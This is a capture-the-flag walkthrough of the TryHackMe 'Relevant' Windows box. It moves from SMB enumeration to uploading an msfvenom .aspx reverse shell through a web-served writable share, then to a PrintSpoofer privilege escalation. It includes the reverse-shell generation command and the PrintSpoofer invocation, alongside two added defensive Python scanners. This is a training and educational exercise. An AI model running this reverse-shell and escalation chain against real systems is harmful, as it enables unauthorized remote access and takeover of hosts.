Relevant

https://tryhackme.com/room/relevant

If you see the victim's IP address change partway through this writeup, it's because the box disconnected at one point.

User flag

Let's start enumerating services with nmap.

We see there are a few open ports. We can start enumerating the SMB service and see if we find anything interesting.

smbclient -L //10.10.98.197 -N

Checking the nt4wrksv share we can see a juicy file, passwords.txt. Let's get it.

The passwords are base64 encoded; decoding them gives us these credentials:

Bill - Juw4nnaM4n420696969!$$$
Bob - !P@$$W0rD!123
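As an added illustration (not part of the original writeup), here is a small Python scanner that does the decoding step more generally: it finds base64-looking tokens in a text file and reports only those that decode to readable text, which is the check you'd run over a share to catch "encoded" credentials like the ones in passwords.txt without drowning in false positives from random alphanumeric strings. The sample file content is constructed here by encoding the two credentials above; the exact layout of the real passwords.txt is not reproduced.

```python
import base64
import binascii
import re
import string

# Constructed sample: roughly what a passwords.txt with base64-encoded lines
# looks like. The plaintexts are the two credentials from the writeup; the
# encoded form is generated here, not copied from the target file.
SAMPLE_PLAINTEXT = [
    "Bill - Juw4nnaM4n420696969!$$$",
    "Bob - !P@$$W0rD!123",
]
SAMPLE_FILE = "\n".join(base64.b64encode(p.encode()).decode() for p in SAMPLE_PLAINTEXT) + "\n"

# Tokens that look like base64: base64 alphabet only, at least 16 characters,
# optional padding. Shorter runs produce too many false positives to be useful.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

PRINTABLE = set(string.printable)


def try_decode(token: str):
    """Return the decoded text if token is valid base64 that yields printable text, else None."""
    # Repair missing padding: a base64 string's length must be a multiple of 4.
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    # Reject binary-looking output so random alphanumerics are not reported as secrets.
    if not text or any(ch not in PRINTABLE for ch in text):
        return None
    return text


def find_encoded_secrets(content: str):
    """Scan text for base64 tokens that decode to readable strings; returns (token, decoded) pairs."""
    findings = []
    for line in content.splitlines():
        for token in B64_TOKEN.findall(line):
            decoded = try_decode(token)
            if decoded is not None:
                findings.append((token, decoded))
    return findings


if __name__ == "__main__":
    for token, decoded in find_encoded_secrets(SAMPLE_FILE):
        print(f"{token}  ->  {decoded}")
```

The two filters (minimum token length and a printable-text check on the result) are what separate this from blindly base64-decoding every word: a 16-character run of letters decodes to garbage bytes and is dropped, while a real encoded credential comes back as readable text.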

Trying to log into the machine with Evil-WinRM or psexec using these credentials gets us nowhere, so we can assume they're a rabbit hole.

Looking back at our scan report we can see there are two ports running an HTTP service. Let's take a look.

We see nothing interesting. If we run gobuster against both HTTP services we find nothing really useful on port 80, but after a while we find a folder named "nt4wrksv" on port 49663 (really after a while: it can take 30-40 minutes).

Heading to the nt4wrksv folder we find an empty page.

We can try to use gobuster again or we can just check if "passwords.txt" exists to see if it's related to the SMB service.

Bingo, so the web server on port 49663 is serving the contents of the SMB share. Now we can try to upload something to the share, and if that works we may be able to get a reverse shell through the web server.

It works. Let's try to upload a reverse shell (a plain .exe reverse shell won't work here, so we generate an .aspx one, which the web server will execute).

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=9001 -f aspx >reverse.aspx

Let's start a listener on port 9001 and trigger the reverse shell by requesting reverse.aspx on the web server.

Grab the flag.

Root flag

Let's check our privileges.

We don't have any tokens to impersonate and DCOM is disabled, so we can't use a potato attack. But we do hold "SeImpersonatePrivilege", and we can abuse it with PrintSpoofer: https://github.com/itm4n/PrintSpoofer
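Added example, not part of the original writeup: the privilege check above is the same one a defender runs when auditing which service accounts hold escalation-enabling rights. This Python snippet parses the text format of `whoami /priv` and flags the privileges that turn a foothold like this one into SYSTEM. The sample output is constructed to illustrate the shape of that command's output for an IIS-style account; it is not a capture from the target. Note that it reports a privilege whether its state is Enabled or Disabled: "Disabled" only means it isn't currently enabled in the token, and the process can switch it on itself.

```python
import re

# Constructed sample of `whoami /priv` output for a service-style account.
# Illustrative of the format only; not captured from the target machine.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that let a compromised low-privileged process reach SYSTEM when
# combined with a coercion trick such as the one PrintSpoofer uses.
RISKY_PRIVILEGES = {
    "SeImpersonatePrivilege": "can impersonate any client that connects to it (PrintSpoofer / potato family)",
    "SeAssignPrimaryTokenPrivilege": "can start processes under another user's token",
}

# Name, free-text description, then the state column.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)$")


def parse_privileges(output: str):
    """Return {privilege_name: state} parsed from `whoami /priv` text."""
    privileges = {}
    for line in output.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privileges[m.group(1)] = m.group(3)
    return privileges


def risky_privileges(output: str):
    """List (name, state, reason) for held privileges that enable escalation.

    A privilege is reported even when Disabled: that state means it is not
    currently enabled in the token, not that the account lacks it.
    """
    held = parse_privileges(output)
    return [(name, held[name], reason) for name, reason in RISKY_PRIVILEGES.items() if name in held]


if __name__ == "__main__":
    for name, state, reason in risky_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"[!] {name} ({state}): {reason}")
```

On this box the privilege itself is expected (IIS application pool identities hold SeImpersonatePrivilege by default); the finding that actually needs fixing is the writable SMB share sitting inside a web root, which is what let an unauthenticated user place an .aspx file where the server would run it.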

Let's get the PrintSpoofer.exe file and upload it to the victim machine using the SMB service.

Now, from our shell on the victim, we change into the folder that backs the SMB share and run the .exe:

PrintSpoofer.exe -i -c cmd

We got admin privileges now. Let's grab the flag and we're done.
